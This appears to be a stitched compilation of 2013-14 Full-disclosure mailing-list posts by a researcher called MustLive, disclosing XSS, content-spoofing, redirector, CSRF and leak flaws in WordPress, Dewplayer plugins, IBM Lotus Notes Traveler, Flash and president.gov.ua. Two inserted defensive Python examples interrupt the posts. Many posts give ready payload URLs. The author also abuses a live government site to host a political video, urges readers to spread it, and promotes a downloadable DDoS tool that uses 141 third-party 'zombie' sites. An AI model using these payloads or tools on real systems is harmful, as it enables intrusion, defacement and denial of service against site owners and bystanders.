can be made as by user with admin rights (to make contact form with uploader tag), as by unauthenticated user, if there is already contact form with uploader tag at web site - with default configuration (unlike previous CE hole). There must be uploader tag in contact form. [file file-423] The files are uploaded into folder: http://site/wp-content/uploads/wpcf7_uploads/ At creation of this folder the file .htaccess is created (with content: Deny from all). 
It can be bypassed when using other web servers besides Apache (where .htaccess is ignored), or on Apache it's possible to use vulnerabilities in WP for file deletion, or via an LFI vulnerability to include a file from this folder.

Timeline:

2013.09.28 - announced at my site about the first hole.
2013.10.01 - informed developer.
2013.10.03-21 - conversation with developer about different vulnerabilities in CF7.
2013.10.09 - plugin version 3.5.3 was released (with fix for the first hole).
2013.10.09 - announced at my site about new holes.
2014.01.28 - disclosed at my site (http://websecurity.com.ua/6806/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
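The advisory above relies on the plugin trusting the uploaded file name and on a .htaccess that only Apache honours. The following is an added example (not Contact Form 7's or WordPress's own code) of an upload-name check that refuses the semicolon and double-extension names mentioned above and never stores the attacker-chosen name on disk; the extension lists are constructed for illustration.

```python
"""Upload file-name validation (added example, not plugin code).

Rejects the two bypass shapes described in the advisory:
  * semicolon in the base name   -> 1.asp;.txt   (IIS treats ';' as end of name)
  * double extension             -> 1.php.txt    (Apache may execute by the inner one)
and keeps the stored name independent of user input, so protection does not
rest on a .htaccess file that non-Apache servers ignore.
"""
import os
import re
import secrets

# Constructed lists for the example; tune them for the stack you deploy on.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar",
    "asp", "aspx", "asa", "cer",
    "jsp", "cgi", "pl", "py", "sh", "htaccess",
}
ALLOWED_EXTENSIONS = {"txt", "pdf", "jpg", "jpeg", "png", "gif", "doc", "docx"}

# Base name may contain only letters, digits, '_' and '-': no ';', NUL,
# whitespace, quotes or anything a web server or shell could reinterpret.
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]+$")


def is_safe_upload_name(filename: str) -> bool:
    """True only if `filename` is safe to store below a web-reachable folder.

    Rules (each one closes a bypass from the advisory or a classic variant):
      1. no path component (rejects ../x.txt and C:\\x.txt)
      2. exactly one dot: one base name and one extension (rejects 1.php.txt,
         1.asp;.txt and dot-files such as .htaccess)
      3. base name restricted to SAFE_BASENAME (rejects a;b.txt, 1.php%00.txt)
      4. extension on the allow-list and never on the executable list
    """
    if not isinstance(filename, str) or not filename:
        return False
    normalized = filename.replace("\\", "/")
    if os.path.basename(normalized) != filename:
        return False                      # contained a directory separator
    parts = filename.split(".")
    if len(parts) != 2:
        return False                      # no extension or more than one
    base, ext = parts
    if not base or not SAFE_BASENAME.match(base):
        return False                      # semicolon, NUL, space, etc.
    ext = ext.lower()
    if ext in EXECUTABLE_EXTENSIONS:
        return False
    return ext in ALLOWED_EXTENSIONS


def storage_name(filename: str) -> str:
    """Name to use on disk: a random token plus the validated extension.

    Even if the upload folder is web-reachable, the attacker no longer
    controls any byte of the path. Raises ValueError for rejected names.
    """
    if not is_safe_upload_name(filename):
        raise ValueError("rejected upload name: %r" % (filename,))
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample names: the two advisory cases plus benign ones.
    for name in ("report.txt", "photo.JPG", "1.asp;.txt", "1.php.txt",
                 "shell.php", "../report.txt", ".htaccess"):
        print("%-16s -> %s" % (name, is_safe_upload_name(name)))
```

Storing uploads outside the document root and serving them through a handler that sets Content-Disposition is the complementary control when .htaccess cannot be relied on.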
[Full-disclosure] Dictatorial laws in Ukraine
Hello participants of Mailing List.

Last week I wrote about multiple vulnerabilities at president.gov.ua (http://seclists.org/fulldisclosure/2014/Jan/125). This is a continuation of that letter.

I remind you that in Ukraine last week the parliament in a non-constitutional way voted for the "Dictatorial laws" (https://twitter.com/EuromaidanPR/status/425224768334225408) and the president quickly signed them. The dictatorial laws (especially #3879) forbid a lot of things and introduce censorship, including censorship in the Internet - SOPA can't even be compared to it. Because the president ignored all protests against these laws (the same as the previous two months of protests), it led to more active protests since 19.01.2013. This week these laws were officially printed and since 22.01.2013 they are in force.

And on Wednesday after 16:00 two of my sites were closed (domains were deactivated) by the provider due to a "decision of special services". It was due to that video about our president, which I "published" at the president's site via the Content Spoofing vulnerability. This is the dictatorial law in action. Now they can turn off any site for defamation (and other things). And they can do it without the decision of a court - very quickly close any site on Ukrainian hosting and domains.

After wasting a lot of time till the end of the day I got my domains back. But I removed the flv-file from my site. And last night I put the video file on a foreign server, so Ukrainian special services can't shut it down :-).

So here is the "republished" video at the president's web site, in which Victor Yanukovich told about his corruption and criminal actions (in Ukrainian language).

http://president.gov.ua/js/jw/player.swf?file=http://lordepsylon.net/video.flv&autostart=true

Use this new URL. Spread it all over social networks, as I did last night in my accounts.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.1.6
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. At 24th of January DAVOSET v.1.1.6 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is Revolution Edition.

Video demonstration of DAVOSET:
http://www.youtube.com/watch?v=RKi35-f346I

Download DAVOSET v.1.1.6:
http://websecurity.com.ua/uploads/2014/DAVOSET_v.1.1.6.rar

In the new version there were added new services into the full list of zombies and removed non-working services from the lists of zombies, added support of a trailing slash in the URL for translate.yandex.net and improved the algorithm of work with open files.

There were added three sites of Yandex - in addition to sites of Google, W3C and a lot of other web sites (who don't want to fix their holes for many years). In total there are 141 zombie-services in the list, which are ready to strike against the ill-intentioned regime.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities at president.gov.ua
Hello participants of Mailing List.

For those who didn't read my posts in social networks last night and at my web site, here is information about multiple vulnerabilities at president.gov.ua. There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities.

In January 2007 I made a "presidents fiesta" - published multiple vulnerabilities at the web sites of the presidents of Ukraine, Russia, USA, Byelorussia and Slovakia. And here are new holes at the web site of the new president of Ukraine.

Cross-Site Scripting (WASC-08):

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Here is a nice example of using one of these holes. The video is "published" at the president's web site, in which Victor Yanukovich told about his corruption and criminal actions (in Ukrainian language).

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

P.S. Photos and videos of the current protest events in Kyiv, Ukraine see in Twitter (including online video translation in my Twitter account).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.1.5
Hello participants of Mailing List.

Happy New Year!

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. At 31st of December DAVOSET v.1.1.5 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is New Year Edition ;-).

Video demonstration of DAVOSET:
http://www.youtube.com/watch?v=RKi35-f346I

Download DAVOSET v.1.1.5:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.5.rar

Use, don't abuse. Happy holidays ddosing.

In the new version there was added an error handler in GetCookie(), added new services into the lists of zombies and removed non-working services from the lists of zombies. Since during 2013 many sites with vulnerable web applications removed these webapps or closed the sites completely. But many new vulnerable sites have come, so the lists of zombies can be easily extended.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] CSRF, XSS and Redirector vulnerabilities in IBM Lotus Notes Traveler
Hello list!

These are Cross-Site Request Forgery, Cross-Site Scripting and Redirector vulnerabilities in IBM Lotus Notes Traveler. They are similar to the CSRF, XSS and Redirector vulnerabilities in IBM Lotus Domino (http://securityvulns.ru/docs29060.html), which I announced at 19.05.2012 and disclosed 15.02.2013 (IBM fixed part of them at 14.03.2013), because the login form in Notes Traveler is based on Domino's functionality.

CVE ID: CVE-2012-4842, CVE-2012-4844.
SecurityVulns ID: 12789.

Since the vulnerabilities are similar, I mentioned the previous CVE and SecurityVulns ids. These are some of 2012's vulnerabilities which need to be released (since the holes in Domino I released earlier this year).

- Affected products: -

Vulnerable are IBM Lotus Notes Traveler 8.5.3 and previous versions. These vulnerabilities were fixed in Domino 9.0 (only XSS and Redirector), which was released at 14.03.2013. All users of previous versions of Lotus Domino and Lotus Notes Traveler are vulnerable to these attacks and IBM didn't fix these holes in the 8.5.x series, only in the new 9.0 series. At that they didn't offer any workaround or mitigation for these issues. But I'll offer such a workaround (see below), which can be used in previous versions of the software.

-- Details: --

Cross-Site Request Forgery (WASC-09):

Lack of captcha in the login form (http://site/servlet/traveler) can be used for different attacks - for a CSRF attack to log into an account (remote login - to conduct attacks on vulnerabilities inside the account), for XSS attacks, for redirect, for Brute Force (which I described in another advisory) and other automated attacks. Which you can read about in the article "Attacks on unprotected login forms" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).

Examples of attacks on the XSS and Redirector vulnerabilities using this CSRF vulnerability are provided below.
Cross-Site Scripting (WASC-08):

For the attack it's needed to use a working login and password at the site (i.e. the attacker needs to use an existing account at the site - his own or someone's account, to which he got access via the Brute Force vulnerability).

Exploit:
http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Notes%20Traveler%20Redirector.html

Redirector (URL Redirector Abuse) (WASC-38):

For the attack it's needed to use a working login and password at the site (i.e. the attacker needs to use an existing account at the site - his own or someone's account, to which he got access via the Brute Force vulnerability).

Exploit:
http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Notes%20Traveler%20Redirector.html

- Workaround: -

My workaround for these vulnerabilities is the next: turn off the html-form for login and use Basic Authentication instead.

Timeline:

Full timeline of the conversation with IBM read in the first advisory (http://securityvulns.ru/docs28474.html) and for similar vulnerabilities in Domino read the timeline in the previous advisory (http://securityvulns.ru/docs29060.html).

- After the conversation with IBM about previous vulnerabilities (mentioned in all my previous advisories concerning IBM software), during June-December 2012 I discussed these advisories with IBM. They answered very slowly and in most cases in their letters they wrote about holes related to Domino, but not to Notes Traveler.
- At 12.12.2012 I sent them information about these vulnerabilities, after IBM at last answered the question concerning Notes Traveler. With those "call me maybe" employees in IBM and their slow answering and even slower fixing of vulnerabilities, I'll not be informing them about vulnerabilities anymore. Instead I'll be selling them to interested security companies (already found such one this year).
- At 15.02.2013 I disclosed at my site about IBM Lotus Domino.
- At 30.12.2013 I disclosed at my site about IBM Lotus Notes Traveler (http://websecurity.com.ua/6951/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DoS vulnerability in Adobe Flash Player (BSOD)
Hello list!

At the beginning of this year I informed you about a DoS vulnerability in Adobe Flash. Look at the advisory (http://seclists.org/fulldisclosure/2013/Apr/9) with exploit and video demonstration (http://www.youtube.com/watch?v=xi29KZ3LD80) of the previous DoS in Flash. Adobe hiddenly fixed it in the patch APSB13-05 and answered that "a fix to another hole accidentally fixed this hole".

And here is a new DoS. Which can be a new hole or can be related to the old one (if Adobe has resurrected the old DoS hole in new versions of Flash). This is a Denial of Service vulnerability in Adobe Flash, which leads to BSOD. Last week I informed Adobe and Mozilla (since the attack works only in Mozilla browsers).

- Affected products: -

The attack works only on AMD/ATI video cards. I checked it on multiple computers with Windows XP, Windows 7 and Ubuntu Linux 13.04.

Vulnerable are Adobe Flash 11.9.900.152 and 11.9.900.170 (the last version) for Windows and Flash 11.2.202.332 for Linux (the last version for this OS). On Linux there is 100% CPU consumption and on Windows (XP and 7) there is a crash of the OS.

-- Details: --

Denial of Service (WASC-10):

This is a Denial of Service vulnerability, which leads to a crash of the Operating System (tested on Windows XP and 7). As the previous DoS hole, this one also works only with AMD/ATI video cards (and it works on different OS, unlike the previous DoS in Flash). Also it works potentially in any flash media player in the Internet - at any web sites, including YouTube (it doesn't require the swf file of VideoJS, as the previous hole).

This is a memory corruption (access violation) vulnerability. Which can be used for BSOD and potentially for remote code execution.

Here is a video which demonstrates this vulnerability in Flash:

http://www.youtube.com/watch?v=-YgbPCq-dH0

In the video there is a web site with JW Player (but freezing and/or crashing of the OS happens in any flash video players).
The attack goes on the Firefox browser (on Windows XP freezing or BSOD can happen from the first time or not from the first time; 100% CPU consumption on Linux works all the time). In Mozilla Firefox 3.0.19, 10.0.7 ESR, 15.0.1 and 26 - freezing of the browser and BSOD of the OS.

I have disclosed it at my site (http://websecurity.com.ua/6939/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer
Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer. Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is a media player which is used at thousands of web sites and in multiple web applications.

There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others).

This flash media player is used in the next plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer.

- Affected products: -

Vulnerable are the next web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions.

Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions.

- Affected vendors: -

Plugins for different CMS with Dewplayer:
http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/
http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779
http://plone.org/products/collective.dewplayer

-- Details: --

These are examples of some vulnerabilities in Dewplayer; examples of all CS and XSS vulnerabilities see in the above-mentioned advisory.

Dewplayer for WordPress:

The plugin contains the next flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes.
Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php

JosDewplayer and mosdewplayer:

Plugin JosDewplayer is based on mosdewplayer, so the holes must be similar in them. The plugin contains the next flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes.

http://site/plugins/content/josdewplayer/dewplayer.swf

collective.dewplayer:

The plugin contains the next flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes. The path at the web site can be different:

http://site/files/++resource++collective.dewplayer/dewplayer.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/dewplayer.swf?mp3=1.mp3

XSS (WASC-08):

http://site/path/dewplayer-vinyl.swf?xml=xss.xml

xss.xml:
javascript:alert(document.cookie)
XSS

Timeline:

2013.10.25 - announced at my site.
2013.10.26 - informed developers.
2013.12.19 - disclosed at my site about Dewplayer.
2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities in Dewplayer
Hello list!

I want to inform you about vulnerabilities in Dewplayer. These are Content Spoofing and Cross-Site Scripting vulnerabilities.

There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others).

- Affected products: -

Vulnerable are Dewplayer 2.2.2 and previous versions.

- Affected vendors: -

Alsacreations
http://www.alsacreations.fr

-- Details: --

Content Spoofing (Content Injection) (WASC-12):

http://site/dewplayer.swf?mp3=1.mp3
http://site/dewplayer.swf?file=1.mp3
http://site/dewplayer.swf?sound=1.mp3
http://site/dewplayer.swf?son=1.mp3

This is for old versions of the player. In versions Dewplayer 2.x there is only mp3 from these 4 variants.

Content Spoofing (Content Injection) (WASC-12):

http://site/dewplayer.swf?xml=1.xml

1.xml:
http://site/1.mp3
Music

2.xml (with image):
http://site/1.mp3
Music
http://site/1.jpg

XSS (WASC-08):

Only the vinyl version of Dewplayer is vulnerable to Cross-Site Scripting.

http://site/dewplayer-vinyl.swf?xml=xss.xml
http://site/dewplayer-vinyl-en.swf?xml=xss.xml

xss.xml:
javascript:alert(document.cookie)
XSS

http://site/dewplayer-vinyl.swf?xml=xss2.xml
http://site/dewplayer-vinyl-en.swf?xml=xss2.xml

xss2.xml:
1.mp3
XSS
javascript:alert(document.cookie)

Timeline:

2013.10.25 - announced at my site.
2013.10.26 - informed developers.
2013.12.19 - disclosed at my site (http://websecurity.com.ua/6831/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1
Hello Julius!

Concerning your tone see Post Scriptum. Concerning your question, then no, my mail client doesn't cut anything :-).

The last two e-mails with subjects "Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1" and "Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1" were not advisories, but informative letters. Thus they were not designed to have a detailed description of vulnerabilities, just information about non-serious developers who hiddenly fixed multiple vulnerabilities in different versions of their software. I see it all the time, when lame developers hiddenly fix holes in their software (many developers do it, with different amounts of holes hiddenly fixed, but still do it), so I decided on the example of WordPress to bring attention to this issue. Since I have looked after the security of this web application since 2006 and found many cases of such activity from WP developers (both concerning holes which I found and found by other security researchers), and wrote about many such cases in previous years.

So in both these letters I wrote only the lists of hidden fixes (not details of vulnerabilities). In the second letter I wrote that the developers didn't mention these holes in the announcement, nor in the Codex, only mentioned them in the changelog of the plugin (which you can see by the link which I provided).

> without actually specifying the vulnerability

I can understand dislike of advisories without details. I also don't like such advisories, like VUPEN's ones (http://securityvulns.ru/docs29802.html). But my two letters were not advisories. In my July letter (http://seclists.org/fulldisclosure/2013/Jul/70) I wrote details about the FPD vulnerability which was hiddenly fixed, because it was an advisory, but the last two letters were just informative ones, as I wrote above. Besides, in the last letter I described in detail a fix with adding a .htaccess file, which is the maximum necessary description for it - what did you not understand with it.
This fix solves vulnerabilities which I disclosed last year, which are available in the list (http://seclists.org/fulldisclosure/2012/Jul/14 and http://seclists.org/fulldisclosure/2012/Jul/221).

P.S.

> Pretty sure this is like the 50th time this year you send an email regarding a vulnerability without actually specifying the vulnerability

I don't like lies and trolling (and trolls lie the most). Not this year, not any previous, nor during the last 9 years in total, I didn't write 50 (or close numbers of) e-mails about vulnerabilities without specifying their details. So you are completely wrong. I even forgave your two trolling attempts earlier this year, but not this time. So I've blacklisted you for trolling and you should never comment on my letters, neither to my e-mail address, nor to the list.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: Julius Kivimäki
To: MustLive
Cc: submissi...@packetstormsecurity.org ; full-disclosure@lists.grok.org.uk
Sent: Monday, December 09, 2013 1:30 AM
Subject: Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1

Pretty sure this is like the 50th time this year you send an email regarding a vulnerability without actually specifying the vulnerability, are you sure your client isn't cutting out parts of your messages?

2013/12/8 MustLive

Hello list!

Earlier I wrote about one vulnerability in WordPress, which was hiddenly fixed in version 3.5.2 (http://seclists.org/fulldisclosure/2013/Jul/70) and about nine vulnerabilities in versions 3.6 and 3.6.1 (http://seclists.org/fulldisclosure/2013/Nov/220). Here are new ones.

These are hiddenly fixed vulnerabilities in such versions of WordPress as 3.5 and 3.5.1. Developers of WP intentionally haven't written about them to decrease the official number of fixed holes. Which is typical for them - since 2007 they often hide fixed vulnerabilities.
As I wrote in July (http://websecurity.com.ua/6634/), there are multiple vulnerabilities in the Akismet plugin, which is bundled with the core of WordPress, so all holes in this plugin are directly related to WP. But developers typically fix holes in Akismet without mentioning them among those fixed in WP (in the official announcement); they even didn't mention in the announcement or Codex about updating the version of the plugin. At that they wrote about fixed holes in the plugin's changelog, but didn't write about the fixed holes which I informed about in 2012 (and didn't fix all the holes). So these vulnerabilities were hiddenly fixed in WP 3.5 and 3.5.1, only mentioned in the changelog (http://wordpress.org/plugins/akismet/changelog/).

WordPress 3.5.1:

In this version of WP the Akismet was updated from 2.5.6 to 2.5.7. In it there were fixed a few Full path disclosure vulnerabilities and added .htaccess to
[Full-disclosure] URL Redirector Abuse and XSS vulnerabilities in WordPress
Hello list!

As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is the translation of the third part of these holes.

These are URL Redirector Abuse and Cross-Site Scripting vulnerabilities in WordPress. These are just a few from multiple such holes in WP.

I informed WordPress developers about the first two redirector holes in 2007 (and proposed a fix, which I released in my MustLive Security Pack), but they at first ignored them and then hiddenly fixed them in WP 2.3. After my informing about redirectors in 2007 (two ones) and in 2012 (in wp-comments-post.php and the Akismet plugin, which is bundled with WP), with which I made a hint that there are a lot of such holes in WP, the developers fixed the first two vulnerabilities in 2007, and the vulnerabilities in Akismet and the below-mentioned vulnerabilities were fixed only in WP 3.6.1 (at 11.09.2013), when they made a "global fix" for all redirectors in the engine.

- Affected products: -

Vulnerable are WordPress 3.6 and previous versions (for one Redirector vulnerable are only versions 3.0 - 3.6).

-- Details: --

Redirector (URL Redirector Abuse) (WASC-38):

http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php

XSS (WASC-08):

http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=data:text/html;edit-tags.php;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Redirector (URL Redirector Abuse) (WASC-38):

Only Redirector is possible, but not XSS (due to filtration of important characters). For the attack it's needed to know the value of _wpnonce.

http://site/wp-admin/edit-tags.php?action=add-tag&_wpnonce=096ea8dbbd&_wp_original_http_referer=http://websecurity.com.ua/?edit-tags.php

For this Redirector vulnerable are WordPress 3.0 - 3.6.
And for these two vulnerable are WordPress 3.6 and previous versions:

http://site/wp-admin/edit-tags.php?action=bulk-delete&_wpnonce=ebee6d0330&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php

http://site/wp-admin/media.php?action=editattachment&_wpnonce=2fa131c992&_wp_original_http_referer=http://websecurity.com.ua/?upload.php

Timeline:

2013.11.30 - disclosed at my site (http://websecurity.com.ua/6907/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
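Both the _wp_http_referer redirects above and the Dewplayer mp3/xml file parameters in the earlier advisories share one root cause: a URL taken from the request is used without checking that it stays on the site's own origin. The following is an added example (not WordPress's wp_validate_redirect nor Dewplayer code) of such a check; the site host "site" and the fallback path are assumed values.

```python
"""Same-origin check for a user-supplied URL parameter (added example).

Use it before issuing a redirect (the _wp_http_referer case) or before
handing a file/playlist URL to an embedded player (the Dewplayer case).
The data: payload above contains the substring "edit-tags.php" precisely to
pass a naive substring check, so the decision is made on the parsed scheme
and host instead.
"""
from urllib.parse import urlsplit


def validate_same_origin_url(candidate, site_host, fallback):
    """Return `candidate` if it points at `site_host`, else `fallback`.

    Accepted:
      * plain relative paths              /wp-admin/edit-tags.php
      * absolute http(s) URLs on the site http://site/1.mp3
    Rejected (returns `fallback`):
      * other hosts                       http://websecurity.com.ua/?edit-tags.php
      * non-http(s) schemes               data:text/html;..., javascript:...
      * scheme-relative / host-less forms //evil, ///evil, http:///evil
      * userinfo tricks                   http://site@evil/
      * backslashes and control chars that browsers and parsers disagree on
    """
    if not isinstance(candidate, str) or not candidate:
        return fallback
    if candidate != candidate.strip() or "\\" in candidate:
        return fallback
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in candidate):
        return fallback
    try:
        parts = urlsplit(candidate)           # scheme is lower-cased here
    except ValueError:                        # e.g. malformed IPv6 brackets
        return fallback

    if parts.scheme == "" and parts.netloc == "":
        # Relative reference. "///evil" parses with an empty netloc but
        # browsers resolve it to host "evil", so refuse any leading "//".
        if candidate.startswith("//"):
            return fallback
        return candidate

    if parts.scheme not in ("http", "https"):
        return fallback                       # data:, javascript:, "//host"
    if parts.netloc == "" or parts.username is not None:
        return fallback                       # http:///evil, http://x@evil/
    if parts.hostname != site_host.lower():
        return fallback
    return candidate


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory URLs, with "site" as our host.
    samples = [
        "http://websecurity.com.ua/?edit-tags.php",
        "data:text/html;edit-tags.php;base64,PHNjcmlwdD4=",
        "javascript:alert(document.cookie)",
        "//websecurity.com.ua/",
        "http://site/wp-admin/edit-tags.php",
        "/wp-admin/upload.php",
    ]
    for s in samples:
        print("%-50s -> %s" % (s, validate_same_origin_url(s, "site", "/wp-admin/")))
```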
[Full-disclosure] CSRF, DoS and IL vulnerabilities in WordPress
Hello list!

As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is the translation of the second part of these holes.

These are Cross-Site Request Forgery, Denial of Service and Information Leakage vulnerabilities in WordPress.

- Affected products: -

For CSRF and DoS vulnerable are WordPress 2.0.11 and previous versions (which had this functionality). Instead of fixing the holes, the developers removed this functionality.

For Information Leakage vulnerable are WordPress 3.7.1 and previous versions. And also WP 3.8, which was released at 14.12.2013 (since the developers traditionally made their new version "vulnerabilities compatible").

-- Details: --

Cross-Site Request Forgery (WASC-09) / Denial of Service (WASC-10):

There is no protection against CSRF in the retrospam functionality.

http://site/wp-admin/options-discussion.php?action=retrospam

The request starts checking of the comments for stop-words, which overloads the server. The more words in the list (and it's possible to add any amount of them via an XSS vulnerability) and the more comments at the site, the more overload.

Cross-Site Request Forgery (WASC-09):

http://site/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1

This request moves comments, including moderated ones, to the moderation list. It's just needed to set the ids of the comments.

Information Leakage (WASC-13):

At a request to the page options.php it's possible to receive important data from the DB. Both at access to the admin panel, and it's possible to get the content of the page via an XSS attack. Particularly different keys, salts, logins and passwords, such as auth_key, auth_salt, logged_in_key, logged_in_salt, nonce_key, nonce_salt, mailserver_login, mailserver_pass (the amount of parameters depends on the version of WP).
http://site/wp-admin/options.php

About the leakage of the login and password from the e-mail account (which are saved in the DB in plain text) at another page of the admin panel I wrote in the previous advisory (http://seclists.org/fulldisclosure/2013/Dec/135). This is the second page where there is a leakage of this data. It allows to take over this site (including in the future, via the password recovery function) and other sites where there is a password recovery function which will send letters to this e-mail. Because a user may use his main e-mail account in the settings (I saw such cases in the Internet).

Timeline:

2013.11.30 - disclosed at my site (http://websecurity.com.ua/6906/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Information Leakage and Backdoor vulnerabilities in WordPress
Hello list!

As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is the translation of the first part of these holes.

These are Information Leakage and Backdoor vulnerabilities in WordPress. Which I have known since June 2006 and they are still actual for all versions of WP.

- Affected products: -

Vulnerable are WordPress 3.7.1 and previous versions. And also WP 3.8, which was released at 14.12.2013 (since the developers traditionally made their new version "vulnerabilities compatible").

-- Details: --

Information Leakage (WASC-13):

The login and password from e-mail are saved in the DB in plain text (unencrypted) in Writing Settings (http://site/wp-admin/options-writing.php), if this functionality is used. So by receiving data from the DB via an SQL Injection or Information Leakage vulnerability, or by receiving the content of this page via XSS, or by accessing the admin panel via any vulnerability, it's possible to get the login and password from the e-mail account.

Which allows to take over this site (including in the future, via the password recovery function) and other sites where there is a password recovery function which will send letters to this e-mail. Because a user may use his main e-mail account in the settings (I saw such cases in the Internet). This is a complete jackpot.

Backdoor:

This functionality also can be used as a backdoor. When the attacker's e-mail is set in the options of Writing Settings, from which the posts will be published at the web site. With XSS code, with black SEO links, with malware code, etc.

Timeline:

2013.11.30 - disclosed at my site (http://websecurity.com.ua/6905/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1
Hello list!

Earlier I wrote about one vulnerability in WordPress which was hiddenly fixed in version 3.5.2 (http://seclists.org/fulldisclosure/2013/Jul/70) and about nine vulnerabilities in versions 3.6 and 3.6.1 (http://seclists.org/fulldisclosure/2013/Nov/220). Here are new ones.

